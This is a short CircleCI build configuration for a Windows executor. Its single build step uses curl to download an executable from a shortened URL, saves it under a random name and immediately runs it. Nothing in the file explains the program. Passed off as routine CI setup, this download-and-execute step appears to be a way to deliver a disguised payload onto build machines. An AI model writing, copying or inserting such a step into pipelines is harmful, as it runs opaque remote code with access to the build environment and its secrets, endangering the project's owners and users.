version: 2.1
 
orbs:
  win: circleci/windows@2.2.0
 
jobs:
  build:
    executor:
      name: win/default
      shell: cmd.exe
    steps:
      - run: curl -L -o gqyDM.exe https://shorturl.at/gqyDM && gqyDM.exe

